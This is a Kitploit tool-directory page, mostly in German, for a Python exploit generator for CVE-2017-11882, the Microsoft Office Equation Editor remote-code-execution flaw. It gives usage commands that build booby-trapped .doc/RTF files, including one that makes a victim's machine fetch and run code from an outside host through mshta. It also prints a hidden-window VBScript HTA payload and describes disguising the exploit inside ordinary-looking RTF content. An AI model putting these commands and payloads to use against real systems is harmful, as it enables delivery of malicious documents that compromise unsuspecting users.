Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-11882 — Python-basierter Exploit-Generator für CVE-2017-11882 (Microsoft Office Equation Editor Remotecodeausführung) mit Unterstützung für benutzerdefinierten Shellcode und mshta-Payloads über RTF/DOC-Dateien. | Kitploit
Tools/GitHubGitHub/likekabin/cve-2017-11882
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHublikekabin/cve-2017-11882

CVE-2017-11882

Python-basierter Exploit-Generator für CVE-2017-11882 (Microsoft Office Equation Editor Remotecodeausführung) mit Unterstützung für benutzerdefinierten Shellcode und mshta-Payloads über RTF/DOC-Dateien.

Repository anzeigen
vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-11882

43b Original-Skript von https://github.com/embedi/CVE-2017-11882

109b Original-Skript von https://github.com/unamer/CVE-2017-11882/ (Respekt, jetzt kann der Code von unamer Shellcode ausführen~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Forschung: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch-Analyse: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC-Ausnutzung: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Usage

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

mshta verwenden

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

43b Befehlslänge darf 43 Bytes nicht überschreiten, 109b Befehlslänge darf 109 Bytes nicht überschreiten

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

Über benutzerdefinierten Inhalt

Eigentlich habe ich die Technik für benutzerdefinierten Inhalt von anderen Kollegen gelernt, sie schon vor langer Zeit in ein Skript geschrieben und hatte nicht vor, sie zu veröffentlichen. Aber nachdem jemand in der Gruppe es bereits gepostet hatte, blieb mir nichts anderes übrig, als es zu veröffentlichen. Die Methode ist eigentlich einfach: Öffnen Sie ein normales RTF-Dokument mit einem Texteditor, kopieren Sie den gesamten Inhalt vor {*\datastore und ersetzen Sie den gesamten Inhalt vor {\object\objautlink\objupdate. Daher ist es einfach, dies in ein Skript zu schreiben.

Verwendung zum Hinzufügen von benutzerdefiniertem Inhalt, wählen Sie ein Skript:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

Der benutzerdefinierte Inhalt befindet sich in input.rtf.

Bezüglich des neuesten 605-Byte-Exploit-Skripts von unamer werde ich es nicht aktualisieren; wenn Interesse besteht, ändern Sie es selbst.

Tool herunterladen